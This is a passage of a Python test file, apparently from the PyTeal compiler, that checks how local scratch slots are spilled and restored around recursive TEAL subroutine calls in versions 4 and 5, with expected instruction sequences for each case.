Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 0), TealOp(None, Op.return_), ] subroutineMapping = {None: mainOps} subroutineGraph = dict() localSlots = {None: set()} spillLocalSlotsDuringRecursion( version, subroutineMapping, subroutineGraph, localSlots ) assert mainOps == [ TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 1), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 0), TealOp(None, Op.return_), ] def test_spillLocalSlotsDuringRecursion_1_subroutine_no_recursion(): for version in (4, 5): subroutine = SubroutineDefinition(lambda: None, TealType.uint64) subroutineL1Label = LabelReference("l1") subroutineOps = [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutineL1Label), TealOp(None, Op.err), TealLabel(None, subroutineL1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ] l1Label = LabelReference("l1") mainOps = [ TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 0), TealOp(None, Op.return_), ] subroutineMapping = {None: mainOps, subroutine: subroutineOps} subroutineGraph = {subroutine: set()} localSlots = {None: set(), subroutine: {0}} spillLocalSlotsDuringRecursion( version, subroutineMapping, subroutineGraph, localSlots ) assert subroutineMapping == { None: [ TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 0), TealOp(None, Op.return_), ], subroutine: [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutineL1Label), TealOp(None, Op.err), TealLabel(None, subroutineL1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ], } def test_spillLocalSlotsDuringRecursion_1_subroutine_recursion_v4(): def sub1Impl(a1): return None subroutine = SubroutineDefinition(sub1Impl, TealType.uint64) subroutineL1Label = LabelReference("l1") subroutineOps = [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutineL1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutineL1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ] l1Label = LabelReference("l1") mainOps = [ TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 0), TealOp(None, Op.return_), ] subroutineMapping = {None: mainOps, subroutine: subroutineOps} subroutineGraph = {subroutine: {subroutine}} localSlots = {None: set(), subroutine: {0}} spillLocalSlotsDuringRecursion(4, subroutineMapping, subroutineGraph, localSlots) assert subroutineMapping == { None: [ TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 0), TealOp(None, Op.return_), ], subroutine: [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutineL1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.load, 0), TealOp(None, Op.dig, 1), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.swap), TealOp(None, Op.store, 0), TealOp(None, Op.swap), TealOp(None, Op.pop), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutineL1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ], } def test_spillLocalSlotsDuringRecursion_1_subroutine_recursion_v5(): def sub1Impl(a1): return None subroutine = SubroutineDefinition(sub1Impl, TealType.uint64) subroutineL1Label = LabelReference("l1") subroutineOps = [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutineL1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutineL1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ] l1Label = LabelReference("l1") mainOps = [ TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 0), TealOp(None, Op.return_), ] subroutineMapping = {None: mainOps, subroutine: subroutineOps} subroutineGraph = {subroutine: {subroutine}} localSlots = {None: set(), subroutine: {0}} spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots) assert subroutineMapping == { None: [ TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 0), TealOp(None, Op.return_), ], subroutine: [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutineL1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.load, 0), TealOp(None, Op.swap), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.swap), TealOp(None, Op.store, 0), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutineL1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ], } def test_spillLocalSlotsDuringRecursion_multiple_subroutines_no_recursion(): for version in (4, 5): def sub1Impl(a1): return None def sub2Impl(a1, a2): return None def sub3Impl(a1, a2, a3): return None subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64) subroutine2 = SubroutineDefinition(sub1Impl, TealType.uint64) subroutine3 = SubroutineDefinition(sub1Impl, TealType.none) subroutine1L1Label = LabelReference("l1") subroutine1Ops = [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine1L1Label), TealOp(None, Op.err), TealLabel(None, subroutine1L1Label), TealOp(None, Op.int, 1), TealOp(None, Op.callsub, subroutine3), TealOp(None, Op.retsub), ] subroutine2L1Label = LabelReference("l1") subroutine2Ops = [ TealOp(None, Op.store, 1), TealOp(None, Op.load, 1), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine2L1Label), TealOp(None, Op.err), TealLabel(None, subroutine2L1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ] subroutine3Ops = [ TealOp(None, Op.retsub), ] l1Label = LabelReference("l1") mainOps = [ TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 101), TealOp(None, Op.callsub, subroutine2), TealOp(None, Op.return_), ] subroutineMapping = { None: mainOps, subroutine1: subroutine1Ops, subroutine2: subroutine2Ops, subroutine3: subroutine3Ops, } subroutineGraph = { subroutine1: {subroutine2}, subroutine2: set(), subroutine3: set(), } localSlots = {None: set(), subroutine1: {0}, subroutine2: {1}, subroutine3: {}} spillLocalSlotsDuringRecursion( version, subroutineMapping, subroutineGraph, localSlots ) assert subroutineMapping == { None: [ TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 101), TealOp(None, Op.callsub, subroutine2), TealOp(None, Op.return_), ], subroutine1: [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine1L1Label), TealOp(None, Op.err), TealLabel(None, subroutine1L1Label), TealOp(None, Op.int, 1), TealOp(None, Op.callsub, subroutine3), TealOp(None, Op.retsub), ], subroutine2: [ TealOp(None, Op.store, 1), TealOp(None, Op.load, 1), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine2L1Label), TealOp(None, Op.err), TealLabel(None, subroutine2L1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ], subroutine3: [ TealOp(None, Op.retsub), ], } def test_spillLocalSlotsDuringRecursion_multiple_subroutines_recursion_v4(): def sub1Impl(a1): return None def sub2Impl(a1, a2): return None def sub3Impl(a1, a2, a3): return None subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64) subroutine2 = SubroutineDefinition(sub1Impl, TealType.uint64) subroutine3 = SubroutineDefinition(sub1Impl, TealType.none) subroutine1L1Label = LabelReference("l1") subroutine1Ops = [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine1L1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutine1L1Label), TealOp(None, Op.load, 255), TealOp(None, Op.retsub), ] subroutine2L1Label = LabelReference("l1") subroutine2Ops = [ TealOp(None, Op.store, 1), TealOp(None, Op.load, 1), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine2L1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutine2L1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ] subroutine3Ops = [ TealOp(None, Op.callsub, subroutine3), TealOp(None, Op.retsub), ] l1Label = LabelReference("l1") mainOps = [ TealOp(None, Op.int, 1), TealOp(None, Op.store, 255), TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 101), TealOp(None, Op.callsub, subroutine2), TealOp(None, Op.return_), TealOp(None, Op.callsub, subroutine3), ] subroutineMapping = { None: mainOps, subroutine1: subroutine1Ops, subroutine2: subroutine2Ops, subroutine3: subroutine3Ops, } subroutineGraph = { subroutine1: {subroutine1}, subroutine2: {subroutine1}, subroutine3: {subroutine3}, } localSlots = {None: set(), subroutine1: {0}, subroutine2: {1}, subroutine3: {}} spillLocalSlotsDuringRecursion(4, subroutineMapping, subroutineGraph, localSlots) assert subroutineMapping == { None: [ TealOp(None, Op.int, 1), TealOp(None, Op.store, 255), TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 101), TealOp(None, Op.callsub, subroutine2), TealOp(None, Op.return_), TealOp(None, Op.callsub, subroutine3), ], subroutine1: [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine1L1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.load, 0), TealOp(None, Op.dig, 1), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.swap), TealOp(None, Op.store, 0), TealOp(None, Op.swap), TealOp(None, Op.pop), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutine1L1Label), TealOp(None, Op.load, 255), TealOp(None, Op.retsub), ], subroutine2: [ TealOp(None, Op.store, 1), TealOp(None, Op.load, 1), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine2L1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutine2L1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ], subroutine3: [ TealOp(None, Op.callsub, subroutine3), TealOp(None, Op.retsub), ], } def test_spillLocalSlotsDuringRecursion_multiple_subroutines_recursion_v5(): def sub1Impl(a1): return None def sub2Impl(a1, a2): return None def sub3Impl(a1, a2, a3): return None subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64) subroutine2 = SubroutineDefinition(sub1Impl, TealType.uint64) subroutine3 = SubroutineDefinition(sub1Impl, TealType.none) subroutine1L1Label = LabelReference("l1") subroutine1Ops = [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine1L1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutine1L1Label), TealOp(None, Op.load, 255), TealOp(None, Op.retsub), ] subroutine2L1Label = LabelReference("l1") subroutine2Ops = [ TealOp(None, Op.store, 1), TealOp(None, Op.load, 1), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine2L1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutine2L1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ] subroutine3Ops = [ TealOp(None, Op.callsub, subroutine3), TealOp(None, Op.retsub), ] l1Label = LabelReference("l1") mainOps = [ TealOp(None, Op.int, 1), TealOp(None, Op.store, 255), TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 101), TealOp(None, Op.callsub, subroutine2), TealOp(None, Op.return_), TealOp(None, Op.callsub, subroutine3), ] subroutineMapping = { None: mainOps, subroutine1: subroutine1Ops, subroutine2: subroutine2Ops, subroutine3: subroutine3Ops, } subroutineGraph = { subroutine1: {subroutine1}, subroutine2: {subroutine1}, subroutine3: {subroutine3}, } localSlots = {None: set(), subroutine1: {0}, subroutine2: {1}, subroutine3: {}} spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots) assert subroutineMapping == { None: [ TealOp(None, Op.int, 1), TealOp(None, Op.store, 255), TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 101), TealOp(None, Op.callsub, subroutine2), TealOp(None, Op.return_), TealOp(None, Op.callsub, subroutine3), ], subroutine1: [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine1L1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.load, 0), TealOp(None, Op.swap), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.swap), TealOp(None, Op.store, 0), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutine1L1Label), TealOp(None, Op.load, 255), TealOp(None, Op.retsub), ], subroutine2: [ TealOp(None, Op.store, 1), TealOp(None, Op.load, 1), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine2L1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutine2L1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ], subroutine3: [ TealOp(None, Op.callsub, subroutine3), TealOp(None, Op.retsub), ], } def test_spillLocalSlotsDuringRecursion_recursive_many_args_no_return_v4(): def subImpl(a1, a2, a3): return None subroutine = SubroutineDefinition(subImpl, TealType.none) subroutineOps = [ TealOp(None, Op.store, 0), TealOp(None, Op.store, 1), TealOp(None, Op.store, 2), TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.retsub), ] mainOps = [ TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.int, 1), TealOp(None, Op.return_), ] subroutineMapping = { None: mainOps, subroutine: subroutineOps, } subroutineGraph = { subroutine: {subroutine}, } localSlots = {None: set(), subroutine: {0, 1, 2}} spillLocalSlotsDuringRecursion(4, subroutineMapping, subroutineGraph, localSlots) assert subroutineMapping == { None: [ TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.int, 1), TealOp(None, Op.return_), ], subroutine: [ TealOp(None, Op.store, 0), TealOp(None, Op.store, 1), TealOp(None, Op.store, 2), TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.load, 0), TealOp(None, Op.load, 1), TealOp(None, Op.load, 2), TealOp(None, Op.dig, 5), TealOp(None, Op.dig, 5), TealOp(None, Op.dig, 5), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.store, 2), TealOp(None, Op.store, 1), TealOp(None, Op.store, 0), TealOp(None, Op.pop), TealOp(None, Op.pop), TealOp(None, Op.pop), TealOp(None, Op.retsub), ], } def test_spillLocalSlotsDuringRecursion_recursive_many_args_no_return_v5(): def subImpl(a1, a2, a3): return None subroutine = SubroutineDefinition(subImpl, TealType.none) subroutineOps = [ TealOp(None, Op.store, 0), TealOp(None, Op.store, 1), TealOp(None, Op.store, 2), TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.retsub), ] mainOps = [ TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.int, 1), TealOp(None, Op.return_), ] subroutineMapping = { None: mainOps, subroutine: subroutineOps, } subroutineGraph = { subroutine: {subroutine}, } localSlots = {None: set(), subroutine: {0, 1, 2}} spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots) assert subroutineMapping == { None: [ TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.int, 1), TealOp(None, Op.return_), ], subroutine: [ TealOp(None, Op.store, 0), TealOp(None, Op.store, 1), TealOp(None, Op.store, 2), TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.load, 0), TealOp(None, Op.load, 1), TealOp(None, Op.load, 2), TealOp(None, Op.uncover, 5), TealOp(None, Op.uncover, 5), TealOp(None, Op.uncover, 5), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.store, 2), TealOp(None, Op.store, 1), TealOp(None, Op.store, 0), TealOp(None, Op.retsub), ], } def test_spillLocalSlotsDuringRecursion_recursive_many_args_return_v4(): def subImpl(a1, a2, a3): return None subroutine = SubroutineDefinition(subImpl, TealType.uint64) subroutineOps = [ TealOp(None, Op.store, 0), TealOp(None, Op.store, 1), TealOp(None, Op.store, 2), TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.retsub), ] mainOps = [ TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), ] subroutineMapping = { None: mainOps, subroutine: subroutineOps, } subroutineGraph = { subroutine: {subroutine}, } localSlots = {None: set(), subroutine: {0, 1, 2}} spillLocalSlotsDuringRecursion(4, subroutineMapping, subroutineGraph, localSlots) assert subroutineMapping == { None: [ TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), ], subroutine: [ TealOp(None, Op.store, 0), TealOp(None, Op.store, 1), TealOp(None, Op.store, 2), TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.load, 0), TealOp(None, Op.load, 1), TealOp(None, Op.load, 2), TealOp(None, Op.dig, 5), TealOp(None, Op.dig, 5), TealOp(None, Op.dig, 5), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.store, 0), TealOp(None, Op.store, 2), TealOp(None, Op.store, 1), TealOp(None, Op.load, 0), TealOp(None, Op.swap), TealOp(None, Op.store, 0), TealOp(None, Op.swap), TealOp(None, Op.pop), TealOp(None, Op.swap), TealOp(None, Op.pop), TealOp(None, Op.swap), TealOp(None, Op.pop), TealOp(None, Op.retsub), ], } def test_spillLocalSlotsDuringRecursion_recursive_many_args_return_v5(): def subImpl(a1, a2, a3): return None subroutine = SubroutineDefinition(subImpl, TealType.uint64) subroutineOps = [ TealOp(None, Op.store, 0), TealOp(None, Op.store, 1), TealOp(None, Op.store, 2), TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.retsub), ] mainOps = [ TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), ] subroutineMapping = { None: mainOps, subroutine: subroutineOps, } subroutineGraph = { subroutine: {subroutine}, } localSlots = {None: set(), subroutine: {0, 1, 2}} spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots) assert subroutineMapping == { None: [ TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), ], subroutine: [ TealOp(None, Op.store, 0), TealOp(None, Op.store, 1), TealOp(None, Op.store, 2), TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.load, 0), TealOp(None, Op.load, 1), TealOp(None, Op.load, 2), TealOp(None, Op.uncover, 5), TealOp(None, Op.uncover, 5), TealOp(None, Op.uncover, 5), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.cover, 3), TealOp(None, Op.store, 2), TealOp(None, Op.store, 1), TealOp(None, Op.store, 0), TealOp(None, Op.retsub), ], } def test_spillLocalSlotsDuringRecursion_recursive_more_args_than_slots_v5(): def subImpl(a1, a2, a3): return None subroutine = SubroutineDefinition(subImpl, TealType.uint64) subroutineOps = [ TealOp(None, Op.store, 0), TealOp(None, Op.store, 1), TealOp(None, Op.pop), TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.retsub), ] mainOps = [ TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), ] subroutineMapping = { None: mainOps, subroutine: subroutineOps, } subroutineGraph = { subroutine: {subroutine}, } localSlots = {None: set(), subroutine: {0, 1}} spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots) assert subroutineMapping == { None: [ TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), ], subroutine: [ TealOp(None, Op.store, 0), TealOp(None, Op.store, 1), TealOp(None, Op.pop), TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.load, 0), TealOp(None, Op.cover, 3), TealOp(None, Op.load, 1), TealOp(None, Op.cover, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.cover, 2), TealOp(None, Op.store, 1), TealOp(None, Op.store, 0), TealOp(None, Op.retsub), ], } def test_spillLocalSlotsDuringRecursion_recursive_more_slots_than_args_v5(): def subImpl(a1, a2, a3): return None subroutine = SubroutineDefinition(subImpl, TealType.uint64) subroutineOps = [ TealOp(None, Op.store, 0), TealOp(None, Op.store, 1), TealOp(None, Op.store, 2), TealOp(None, Op.int, 10), TealOp(None, Op.store, 3), TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.retsub), ] mainOps = [ TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), ] subroutineMapping = { None: mainOps, subroutine: subroutineOps, } subroutineGraph = { subroutine: {subroutine}, } localSlots = {None: set(), subroutine: {0, 1, 2, 3}} spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots) assert subroutineMapping == { None: [ TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.return_), ], subroutine: [ TealOp(None, Op.store, 0), TealOp(None, Op.store, 1), TealOp(None, Op.store, 2), TealOp(None, Op.int, 10), TealOp(None, Op.store, 3), TealOp(None, Op.int, 1), TealOp(None, Op.int, 2), TealOp(None, Op.int, 3), TealOp(None, Op.load, 0), TealOp(None, Op.load, 1), TealOp(None, Op.load, 2), TealOp(None, Op.load, 3), TealOp(None, Op.uncover, 6), TealOp(None, Op.uncover, 6), TealOp(None, Op.uncover, 6), TealOp(None, Op.callsub, subroutine), TealOp(None, Op.cover, 4), TealOp(None, Op.store, 3), TealOp(None, Op.store, 2), TealOp(None, Op.store, 1), TealOp(None, Op.store, 0), TealOp(None, Op.retsub), ], } def test_spillLocalSlotsDuringRecursion_recursive_with_scratchvar(): # modifying test_spillLocalSlotsDuringRecursion_multiple_subroutines_no_recursion() # to be recursive and fail due to by-ref args def sub1Impl(a1): return None def sub2Impl(a1, a2: ScratchVar): return None def sub3Impl(a1, a2, a3): return None subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64) subroutine2 = SubroutineDefinition(sub2Impl, TealType.uint64) subroutine3 = SubroutineDefinition(sub3Impl, TealType.none) subroutine1L1Label = LabelReference("l1") subroutine1Ops = [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine1L1Label), TealOp(None, Op.err), TealLabel(None, subroutine1L1Label), TealOp(None, Op.int, 1), TealOp(None, Op.callsub, subroutine3), TealOp(None, Op.retsub), ] subroutine2L1Label = LabelReference("l1") subroutine2Ops = [ TealOp(None, Op.store, 1), TealOp(None, Op.load, 1), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine2L1Label), TealOp(None, Op.err), TealLabel(None, subroutine2L1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ] subroutine3Ops = [ TealOp(None, Op.retsub), ] l1Label = LabelReference("l1") mainOps = [ TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 101), TealOp(None, Op.callsub, subroutine2), TealOp(None, Op.return_), ] subroutineMapping = { None: mainOps, subroutine1: subroutine1Ops, subroutine2: subroutine2Ops, subroutine3: subroutine3Ops, } subroutineGraph = { subroutine1: {subroutine2}, subroutine2: {subroutine1}, subroutine3: set(), } localSlots = {None: set(), subroutine1: {0}, subroutine2: {1}, subroutine3: {}} with pytest.raises(TealInputError) as tie: spillLocalSlotsDuringRecursion( 5, subroutineMapping, subroutineGraph, localSlots ) assert ( "ScratchVar arguments not allowed in recursive subroutines, but a recursive call-path was detected: 